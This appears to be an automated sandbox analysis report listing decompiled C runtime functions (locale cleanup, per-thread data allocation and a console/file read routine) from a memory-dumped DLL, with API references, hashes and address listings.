0x6d4cbd10
0x6d4cbd16
0x6d4cbd19
0x6d4cbd19
0x6d4cbd1c
0x6d4cbd23
0x6d4cbd25
0x6d4cbd29
0x6d4cbd31
0x6d4cbd38
0x6d4cbd3e
0x6d4cbd3f
0x6d4cbd3f
0x6d4cbd46
0x6d4cbd48
0x6d4cbd48
0x6d4cbd4d
0x6d4cbd55
0x6d4cbd5a
0x6d4cbd5b
0x6d4cbd5b
0x6d4cbd5e
0x6d4cbd61
0x6d4cbd64
0x6d4cbd67
0x6d4cbd67
0x6d4cbd79

APIs

___free_lconv_mon.LIBCMT ref: 6D4CBC74

Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBF61
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBF73
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBF85
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBF97
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBFA9
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBFBB
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBFCD
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBFDF
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBFF1
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CC003
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CC015
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CC027
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CC039

_free.LIBCMT ref: 6D4CBC69

Part of subcall function 6D4C02CE: HeapFree.KERNEL32(00000000,00000000,?,6D4CC724,6D4D78BF,00000000,6D4D78BF,00000000,?,6D4CCA29,6D4D78BF,00000007,6D4D78BF,?,6D4CBDC8,6D4D78BF), ref: 6D4C02E4
Part of subcall function 6D4C02CE: GetLastError.KERNEL32(6D4D78BF,?,6D4CC724,6D4D78BF,00000000,6D4D78BF,00000000,?,6D4CCA29,6D4D78BF,00000007,6D4D78BF,?,6D4CBDC8,6D4D78BF,6D4D78BF), ref: 6D4C02F6

_free.LIBCMT ref: 6D4CBC8B
_free.LIBCMT ref: 6D4CBCA0
_free.LIBCMT ref: 6D4CBCAB
_free.LIBCMT ref: 6D4CBCCD
_free.LIBCMT ref: 6D4CBCE0
_free.LIBCMT ref: 6D4CBCEE
_free.LIBCMT ref: 6D4CBCF9
_free.LIBCMT ref: 6D4CBD31
_free.LIBCMT ref: 6D4CBD38
_free.LIBCMT ref: 6D4CBD55
_free.LIBCMT ref: 6D4CBD6D

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: e30783bc724e0ab22ef163a5af8ac72329d5a4bc0ad61ec0d560dc0186cae01b
Instruction ID: 723a9988ff43810c956a1fc028de71134e3d95526f5fa90ba1f9796108423535
Opcode Fuzzy Hash: e30783bc724e0ab22ef163a5af8ac72329d5a4bc0ad61ec0d560dc0186cae01b
Instruction Fuzzy Hash: 6E314B796083069FEB209B75D944F6A77E9EF00325F31482DE959DB250EF35AC80CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CCA10, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D4CCA10(intOrPtr _a4) {
				void* _t18;
				intOrPtr _t45;

				_t45 = _a4;
				if(_t45 != 0) {
					E6D4CC6F6(_t45, 7);
					_t2 = _t45 + 0x1c; // 0x6d4d78db
					E6D4CC6F6(_t2, 7);
					_t3 = _t45 + 0x38; // 0x6d4d78f7
					E6D4CC6F6(_t3, 0xc);
					_t4 = _t45 + 0x68; // 0x6d4d7927
					E6D4CC6F6(_t4, 0xc);
					_t5 = _t45 + 0x98; // 0x6d4d7957
					E6D4CC6F6(_t5, 2);
					_t6 = _t45 + 0xa0; // 0xfffb7885
					E6D4C02CE( *_t6);
					_t7 = _t45 + 0xa4; // 0x2b1e75ff
					E6D4C02CE( *_t7);
					_t8 = _t45 + 0xa8; // 0x534a280d
					E6D4C02CE( *_t8);
					_t9 = _t45 + 0xb4; // 0x6d4d7973
					E6D4CC6F6(_t9, 7);
					_t10 = _t45 + 0xd0; // 0x6d4d798f
					E6D4CC6F6(_t10, 7);
					_t11 = _t45 + 0xec; // 0x6d4d79ab
					E6D4CC6F6(_t11, 0xc);
					_t12 = _t45 + 0x11c; // 0x6d4d79db
					E6D4CC6F6(_t12, 0xc);
					_t13 = _t45 + 0x14c; // 0x6d4d7a0b
					E6D4CC6F6(_t13, 2);
					_t14 = _t45 + 0x154; // 0xb9f0692a
					E6D4C02CE( *_t14);
					_t15 = _t45 + 0x158; // 0x33000014
					E6D4C02CE( *_t15);
					_t16 = _t45 + 0x15c; // 0x2bfe8bc0
					E6D4C02CE( *_t16);
					_t17 = _t45 + 0x160; // 0x534a3035
					return E6D4C02CE( *_t17);
				}
				return _t18;
			}

0x6d4cca16
0x6d4cca1b
0x6d4cca24
0x6d4cca29
0x6d4cca2f
0x6d4cca34
0x6d4cca3a
0x6d4cca3f
0x6d4cca45
0x6d4cca4a
0x6d4cca53
0x6d4cca58
0x6d4cca5e
0x6d4cca63
0x6d4cca69
0x6d4cca6e
0x6d4cca74
0x6d4cca79
0x6d4cca82
0x6d4cca87
0x6d4cca90
0x6d4cca98
0x6d4ccaa1
0x6d4ccaa6
0x6d4ccaaf
0x6d4ccab4
0x6d4ccabd
0x6d4ccac2
0x6d4ccac8
0x6d4ccacd
0x6d4ccad3
0x6d4ccad8
0x6d4ccade
0x6d4ccae3
0x00000000
0x6d4ccaee
0x6d4ccaf3

APIs

Part of subcall function 6D4CC6F6: _free.LIBCMT ref: 6D4CC71F

_free.LIBCMT ref: 6D4CCA5E

Part of subcall function 6D4C02CE: HeapFree.KERNEL32(00000000,00000000,?,6D4CC724,6D4D78BF,00000000,6D4D78BF,00000000,?,6D4CCA29,6D4D78BF,00000007,6D4D78BF,?,6D4CBDC8,6D4D78BF), ref: 6D4C02E4
Part of subcall function 6D4C02CE: GetLastError.KERNEL32(6D4D78BF,?,6D4CC724,6D4D78BF,00000000,6D4D78BF,00000000,?,6D4CCA29,6D4D78BF,00000007,6D4D78BF,?,6D4CBDC8,6D4D78BF,6D4D78BF), ref: 6D4C02F6

_free.LIBCMT ref: 6D4CCA69
_free.LIBCMT ref: 6D4CCA74
_free.LIBCMT ref: 6D4CCAC8
_free.LIBCMT ref: 6D4CCAD3
_free.LIBCMT ref: 6D4CCADE
_free.LIBCMT ref: 6D4CCAE9

Strings

|, xrefs: 6D4CCA8F

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: |
API String ID: 776569668-2272152440
Opcode ID: 9d7fa3d03ade73cbe32b9155f84779464575b1a55af6e10987faf18e024615a8
Instruction ID: 05dd7c52da67924be9ad83aaee827d802a456890a2019beb5be96e66a56c2e14
Opcode Fuzzy Hash: 9d7fa3d03ade73cbe32b9155f84779464575b1a55af6e10987faf18e024615a8
Instruction Fuzzy Hash: 4511AC79A49B08AAEA20EBB0CD05FCB779EAF00304F45081CB7A9B6050CB64FC4086C2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BDE57, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E6D4BDE57(void* __ebx, void* __ecx, void* __edx, void* __fp0) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;
				void* _t48;

				_t48 = __fp0;
				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x6d5341e0; // 0x8
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E6D4BF58C(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E6D4C48FD(_t25, _t36, __eflags,  *0x6d5341e0, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E6D4BDB97(_t25, _t31, "hyc");
							E6D4C02CE(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E6D4C02CE();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E6D4B5C1C(_t20, _t29, _t31, _t36, _t48);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x6d5341e0; // 0x8
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E6D4BF58C(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E6D4C48FD(_t27, _t37, __eflags,  *0x6d5341e0, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E6D4BDB97(_t27, _t32, "hyc");
									E6D4C02CE(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E6D4C02CE();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E6D4C48A7(_t25, _t37, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E6D4C48A7(_t23, _t36, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

0x6d4bde57
0x6d4bde57
0x6d4bde57
0x6d4bde57
0x6d4bde61
0x6d4bde63
0x6d4bde68
0x6d4bde6b
0x6d4bde79
0x6d4bde80
0x6d4bde85
0x6d4bde88
0x6d4bde8b
0x6d4bde9d
0x6d4bdea2
0x6d4bdea4
0x6d4bdeaf
0x6d4bdeb6
0x6d4bdebb
0x6d4bdebe
0x6d4bdec0
0x00000000
0x00000000
0x00000000
0x00000000
0x6d4bdea6
0x6d4bdea6
0x00000000
0x6d4bdea6
0x6d4bde8d
0x6d4bde8d
0x6d4bde8e
0x6d4bde8e
0x6d4bde93
0x6d4bdece
0x6d4bdecf
0x6d4bded5
0x6d4bdeda
0x6d4bdedd
0x6d4bdede
0x6d4bdedf
0x6d4bdee6
0x6d4bdee8
0x6d4bdeea
0x6d4bdeef
0x6d4bdef2
0x6d4bdf00
0x6d4bdf0c
0x6d4bdf0f
0x6d4bdf12
0x6d4bdf24
0x6d4bdf29
0x6d4bdf2b
0x6d4bdf36
0x6d4bdf3c
0x6d4bdf44
0x6d4bdf46
0x00000000
0x00000000
0x00000000
0x00000000
0x6d4bdf2d
0x6d4bdf2d
0x00000000
0x6d4bdf2d
0x6d4bdf14
0x6d4bdf14
0x6d4bdf15
0x6d4bdf15
0x6d4bdf48
0x6d4bdf49
0x6d4bdf49
0x6d4bdef4
0x6d4bdefa
0x6d4bdefe
0x6d4bdf51
0x6d4bdf52
0x6d4bdf58
0x00000000
0x00000000
0x00000000
0x6d4bdefe
0x6d4bdf5f
0x6d4bdf5f
0x6d4bde6d
0x6d4bde73
0x6d4bde77
0x6d4bdec2
0x6d4bdec3
0x6d4bdecd
0x00000000
0x00000000
0x00000000
0x6d4bde77

APIs

GetLastError.KERNEL32(?,ios_base::failbit set,6D4B3983,6D532068,0000000C,6D4FBC90,00000001,6D4FBC90,00000000,?,6D456A94,97F0AF70), ref: 6D4BDE5B
_free.LIBCMT ref: 6D4BDE8E
_free.LIBCMT ref: 6D4BDEB6
SetLastError.KERNEL32(00000000,?,?,?,?,?,?,00000000,?,6D456A94,97F0AF70), ref: 6D4BDEC3
SetLastError.KERNEL32(00000000,?,?,?,?,?,?,00000000,?,6D456A94,97F0AF70), ref: 6D4BDECF
_abort.LIBCMT ref: 6D4BDED5

Strings

hyc, xrefs: 6D4BDEA9
ios_base::failbit set, xrefs: 6D4BDE59

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_free$_abort
String ID: hyc$ios_base::failbit set
API String ID: 3160817290-932836079
Opcode ID: e1390838b764a5236f3fc8d54c623925e1e83075214bcca5f555afb06658cb94
Instruction ID: 5379e335cb7943bf93024828e80a1b306c7192e2a0354b798b4b247f66b3b47a
Opcode Fuzzy Hash: e1390838b764a5236f3fc8d54c623925e1e83075214bcca5f555afb06658cb94
Instruction Fuzzy Hash: 0BF0F43D508E0126DB0256399D08F2B26769FF67AAF37415DF61A92680EF398C0280B2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C5B5F, Relevance: 13.8, APIs: 9, Instructions: 300
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6D4C5B5F(signed int _a4, void* _a8, unsigned int _a12) {
				signed int _v5;
				char _v6;
				void* _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				long _v36;
				void* _v40;
				long _v44;
				signed int* _t143;
				signed int _t145;
				intOrPtr _t149;
				signed int _t153;
				signed int _t155;
				signed char _t157;
				unsigned int _t158;
				intOrPtr _t162;
				void* _t163;
				signed int _t164;
				signed int _t167;
				long _t168;
				intOrPtr _t175;
				signed int _t176;
				intOrPtr _t178;
				signed int _t180;
				signed int _t184;
				char _t191;
				char* _t192;
				char _t199;
				char* _t200;
				signed char _t211;
				signed int _t213;
				long _t215;
				signed int _t216;
				char _t218;
				signed char _t222;
				signed int _t223;
				unsigned int _t224;
				intOrPtr _t225;
				unsigned int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed char _t236;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t246;
				void* _t248;
				void* _t249;

				_t213 = _a4;
				if(_t213 != 0xfffffffe) {
					__eflags = _t213;
					if(_t213 < 0) {
						L58:
						_t143 = E6D4B41E6();
						 *_t143 =  *_t143 & 0x00000000;
						__eflags =  *_t143;
						 *((intOrPtr*)(E6D4B41F9())) = 9;
						L59:
						_t145 = E6D4B40C8();
						goto L60;
					}
					__eflags = _t213 -  *0x6d540938; // 0x40
					if(__eflags >= 0) {
						goto L58;
					}
					_v24 = 1;
					_t239 = _t213 >> 6;
					_t235 = (_t213 & 0x0000003f) * 0x30;
					_v20 = _t239;
					_t149 =  *((intOrPtr*)(0x6d540738 + _t239 * 4));
					_v28 = _t235;
					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
					_v5 = _t222;
					__eflags = _t222 & 0x00000001;
					if((_t222 & 0x00000001) == 0) {
						goto L58;
					}
					_t223 = _a12;
					__eflags = _t223 - 0x7fffffff;
					if(_t223 <= 0x7fffffff) {
						__eflags = _t223;
						if(_t223 == 0) {
							L57:
							return 0;
						}
						__eflags = _v5 & 0x00000002;
						if((_v5 & 0x00000002) != 0) {
							goto L57;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
						_v5 = _t153;
						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
						_t246 = 0;
						_t155 = _t153 - 1;
						__eflags = _t155;
						if(_t155 == 0) {
							_t236 = _v24;
							_t157 =  !_t223;
							__eflags = _t236 & _t157;
							if((_t236 & _t157) != 0) {
								_t158 = 4;
								_t224 = _t223 >> 1;
								_v16 = _t158;
								__eflags = _t224 - _t158;
								if(_t224 >= _t158) {
									_t158 = _t224;
									_v16 = _t224;
								}
								_t246 = E6D4C1817(_t224, _t158);
								E6D4C02CE(0);
								E6D4C02CE(0);
								_t249 = _t248 + 0xc;
								_v12 = _t246;
								__eflags = _t246;
								if(_t246 != 0) {
									_t162 = E6D4C17FC(_t213, 0, 0, _v24);
									_t225 =  *((intOrPtr*)(0x6d540738 + _t239 * 4));
									_t248 = _t249 + 0x10;
									_t240 = _v28;
									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
									_t163 = _t246;
									 *(_t240 + _t225 + 0x24) = _t236;
									_t235 = _t240;
									_t223 = _v16;
									L21:
									_t241 = 0;
									_v40 = _t163;
									_t215 =  *((intOrPtr*)(0x6d540738 + _v20 * 4));
									_v36 = _t215;
									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
									_t216 = _a4;
									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
										_v6 = _t218;
										__eflags = _t218 - 0xa;
										_t216 = _a4;
										if(_t218 != 0xa) {
											__eflags = _t223;
											if(_t223 != 0) {
												_t241 = _v24;
												 *_t163 = _v6;
												_t216 = _a4;
												_t232 = _t223 - 1;
												__eflags = _v5;
												_v12 = _t163 + 1;
												_v16 = _t232;
												 *((char*)(_t235 +  *((intOrPtr*)(0x6d540738 + _v20 * 4)) + 0x2a)) = 0xa;
												if(_v5 != 0) {
													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x6d540738 + _v20 * 4)) + 0x2b));
													_v6 = _t191;
													__eflags = _t191 - 0xa;
													if(_t191 != 0xa) {
														__eflags = _t232;
														if(_t232 != 0) {
															_t192 = _v12;
															_t241 = 2;
															 *_t192 = _v6;
															_t216 = _a4;
															_t233 = _t232 - 1;
															_v12 = _t192 + 1;
															_v16 = _t233;
															 *((char*)(_t235 +  *((intOrPtr*)(0x6d540738 + _v20 * 4)) + 0x2b)) = 0xa;
															__eflags = _v5 - _v24;
															if(_v5 == _v24) {
																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x6d540738 + _v20 * 4)) + 0x2c));
																_v6 = _t199;
																__eflags = _t199 - 0xa;
																if(_t199 != 0xa) {
																	__eflags = _t233;
																	if(_t233 != 0) {
																		_t200 = _v12;
																		_t241 = 3;
																		 *_t200 = _v6;
																		_t216 = _a4;
																		_t234 = _t233 - 1;
																		__eflags = _t234;
																		_v12 = _t200 + 1;
																		_v16 = _t234;
																		 *((char*)(_t235 +  *((intOrPtr*)(0x6d540738 + _v20 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t164 = E6D4D1498(_t216);
									__eflags = _t164;
									if(_t164 == 0) {
										L41:
										_v24 = 0;
										L42:
										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
										__eflags = _t167;
										if(_t167 == 0) {
											L53:
											_t168 = GetLastError();
											_t241 = 5;
											__eflags = _t168 - _t241;
											if(_t168 != _t241) {
												__eflags = _t168 - 0x6d;
												if(_t168 != 0x6d) {
													L37:
													E6D4B41C3(_t168);
													goto L38;
												}
												_t242 = 0;
												goto L39;
											}
											 *((intOrPtr*)(E6D4B41F9())) = 9;
											 *(E6D4B41E6()) = _t241;
											goto L38;
										}
										_t229 = _a12;
										__eflags = _v36 - _t229;
										if(_v36 > _t229) {
											goto L53;
										}
										_t242 = _t241 + _v36;
										__eflags = _t242;
										L45:
										_t237 = _v28;
										_t175 =  *((intOrPtr*)(0x6d540738 + _v20 * 4));
										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v24;
												_push(_t242 >> 1);
												_push(_v40);
												_push(_t216);
												if(_v24 == 0) {
													_t176 = E6D4C565B();
												} else {
													_t176 = E6D4C59CB();
												}
											} else {
												_t230 = _t229 >> 1;
												__eflags = _t229 >> 1;
												_t176 = E6D4C587B(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
											}
											_t242 = _t176;
										}
										goto L39;
									}
									_t231 = _v28;
									_t178 =  *((intOrPtr*)(0x6d540738 + _v20 * 4));
									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
										goto L41;
									}
									_t180 = GetConsoleMode(_v32,  &_v44);
									__eflags = _t180;
									if(_t180 == 0) {
										goto L41;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L42;
									}
									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
									__eflags = _t184;
									if(_t184 != 0) {
										_t229 = _a12;
										_t242 = _t241 + _v36 * 2;
										goto L45;
									}
									_t168 = GetLastError();
									goto L37;
								} else {
									 *((intOrPtr*)(E6D4B41F9())) = 0xc;
									 *(E6D4B41E6()) = 8;
									L38:
									_t242 = _t241 | 0xffffffff;
									__eflags = _t242;
									L39:
									E6D4C02CE(_t246);
									return _t242;
								}
							}
							L15:
							 *(E6D4B41E6()) =  *_t206 & _t246;
							 *((intOrPtr*)(E6D4B41F9())) = 0x16;
							E6D4B40C8();
							goto L38;
						}
						__eflags = _t155 != 1;
						if(_t155 != 1) {
							L13:
							_t163 = _a8;
							_v16 = _t223;
							_v12 = _t163;
							goto L21;
						}
						_t211 =  !_t223;
						__eflags = _t211 & 0x00000001;
						if((_t211 & 0x00000001) == 0) {
							goto L15;
						}
						goto L13;
					}
					L6:
					 *(E6D4B41E6()) =  *_t151 & 0x00000000;
					 *((intOrPtr*)(E6D4B41F9())) = 0x16;
					goto L59;
				} else {
					 *(E6D4B41E6()) =  *_t212 & 0x00000000;
					_t145 = E6D4B41F9();
					 *_t145 = 9;
					L60:
					return _t145 | 0xffffffff;
				}
			}

0x6d4c5b68
0x6d4c5b6f
0x6d4c5b89
0x6d4c5b8b
0x6d4c5ef3
0x6d4c5ef3
0x6d4c5ef8
0x6d4c5ef8
0x6d4c5f00
0x6d4c5f06
0x6d4c5f06
0x00000000
0x6d4c5f06
0x6d4c5b91
0x6d4c5b97
0x00000000
0x00000000
0x6d4c5b9f
0x6d4c5bab
0x6d4c5bae
0x6d4c5bb1
0x6d4c5bb4
0x6d4c5bbb
0x6d4c5bbe
0x6d4c5bc2
0x6d4c5bc5
0x6d4c5bc8
0x00000000
0x00000000
0x6d4c5bce
0x6d4c5bd1
0x6d4c5bd7
0x6d4c5bf1
0x6d4c5bf3
0x6d4c5eef
0x00000000
0x6d4c5eef
0x6d4c5bf9
0x6d4c5bfd
0x00000000
0x00000000
0x6d4c5c03
0x6d4c5c07
0x00000000
0x00000000
0x6d4c5c0e
0x6d4c5c12
0x6d4c5c15
0x6d4c5c18
0x6d4c5c1d
0x6d4c5c1d
0x6d4c5c20
0x6d4c5c3d
0x6d4c5c42
0x6d4c5c44
0x6d4c5c46
0x6d4c5c66
0x6d4c5c67
0x6d4c5c69
0x6d4c5c6c
0x6d4c5c6e
0x6d4c5c70
0x6d4c5c72
0x6d4c5c72
0x6d4c5c7d
0x6d4c5c7f
0x6d4c5c86
0x6d4c5c8b
0x6d4c5c8e
0x6d4c5c91
0x6d4c5c93
0x6d4c5cb8
0x6d4c5cbd
0x6d4c5cc4
0x6d4c5cc7
0x6d4c5cca
0x6d4c5cce
0x6d4c5cd0
0x6d4c5cd4
0x6d4c5cd6
0x6d4c5cd9
0x6d4c5cdc
0x6d4c5cde
0x6d4c5ce1
0x6d4c5ce8
0x6d4c5ceb
0x6d4c5cf0
0x6d4c5cf3
0x6d4c5cfc
0x6d4c5d00
0x6d4c5d03
0x6d4c5d06
0x6d4c5d09
0x6d4c5d0f
0x6d4c5d11
0x6d4c5d1a
0x6d4c5d1d
0x6d4c5d20
0x6d4c5d23
0x6d4c5d24
0x6d4c5d28
0x6d4c5d2e
0x6d4c5d38
0x6d4c5d3d
0x6d4c5d4d
0x6d4c5d51
0x6d4c5d54
0x6d4c5d56
0x6d4c5d58
0x6d4c5d5a
0x6d4c5d5c
0x6d4c5d64
0x6d4c5d65
0x6d4c5d68
0x6d4c5d6b
0x6d4c5d6c
0x6d4c5d72
0x6d4c5d7c
0x6d4c5d84
0x6d4c5d87
0x6d4c5d93
0x6d4c5d97
0x6d4c5d9a
0x6d4c5d9c
0x6d4c5d9e
0x6d4c5da0
0x6d4c5da2
0x6d4c5daa
0x6d4c5dab
0x6d4c5dae
0x6d4c5db1
0x6d4c5db1
0x6d4c5db2
0x6d4c5db8
0x6d4c5dc2
0x6d4c5dc2
0x6d4c5da0
0x6d4c5d9c
0x6d4c5d87
0x6d4c5d5a
0x6d4c5d56
0x6d4c5d3d
0x6d4c5d11
0x6d4c5d09
0x6d4c5dc8
0x6d4c5dce
0x6d4c5dd0
0x6d4c5e43
0x6d4c5e43
0x6d4c5e47
0x6d4c5e57
0x6d4c5e5d
0x6d4c5e5f
0x6d4c5ebb
0x6d4c5ebb
0x6d4c5ec3
0x6d4c5ec4
0x6d4c5ec6
0x6d4c5edf
0x6d4c5ee2
0x6d4c5e1f
0x6d4c5e20
0x00000000
0x6d4c5e25
0x6d4c5ee8
0x00000000
0x6d4c5ee8
0x6d4c5ecd
0x6d4c5ed8
0x00000000
0x6d4c5ed8
0x6d4c5e61
0x6d4c5e64
0x6d4c5e67
0x00000000
0x00000000
0x6d4c5e69
0x6d4c5e69
0x6d4c5e6c
0x6d4c5e6f
0x6d4c5e72
0x6d4c5e79
0x6d4c5e7e
0x6d4c5e80
0x6d4c5e84
0x6d4c5e9f
0x6d4c5ea3
0x6d4c5ea4
0x6d4c5ea7
0x6d4c5ea8
0x6d4c5eb4
0x6d4c5eaa
0x6d4c5eaa
0x6d4c5eaa
0x6d4c5e86
0x6d4c5e86
0x6d4c5e86
0x6d4c5e91
0x6d4c5e96
0x6d4c5e99
0x6d4c5e99
0x00000000
0x6d4c5e7e
0x6d4c5dd5
0x6d4c5dd8
0x6d4c5ddf
0x6d4c5de4
0x00000000
0x00000000
0x6d4c5ded
0x6d4c5df3
0x6d4c5df5
0x00000000
0x00000000
0x6d4c5df7
0x6d4c5dfb
0x00000000
0x00000000
0x6d4c5e0f
0x6d4c5e15
0x6d4c5e17
0x6d4c5e3b
0x6d4c5e3e
0x00000000
0x6d4c5e3e
0x6d4c5e19
0x00000000
0x6d4c5c95
0x6d4c5c9a
0x6d4c5ca5
0x6d4c5e26
0x6d4c5e26
0x6d4c5e26
0x6d4c5e29
0x6d4c5e2a
0x00000000
0x6d4c5e32
0x6d4c5c93
0x6d4c5c48
0x6d4c5c4d
0x6d4c5c54
0x6d4c5c5a
0x00000000
0x6d4c5c5a
0x6d4c5c22
0x6d4c5c25
0x6d4c5c2f
0x6d4c5c2f
0x6d4c5c32
0x6d4c5c35
0x00000000
0x6d4c5c35
0x6d4c5c29
0x6d4c5c2b
0x6d4c5c2d
0x00000000
0x00000000
0x00000000
0x6d4c5c2d
0x6d4c5bd9
0x6d4c5bde
0x6d4c5be6
0x00000000
0x6d4c5b71
0x6d4c5b76
0x6d4c5b79
0x6d4c5b7e
0x6d4c5f0b
0x00000000
0x6d4c5f0b

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 065e9258ac6a30acafc9365b913b9289a609cad061760f7c33bbb01aaa8776c5
Instruction ID: fab856745e61aafe028194d5cca3168a18b08f21658e83dac7dbe6dc952cc962
Opcode Fuzzy Hash: 065e9258ac6a30acafc9365b913b9289a609cad061760f7c33bbb01aaa8776c5
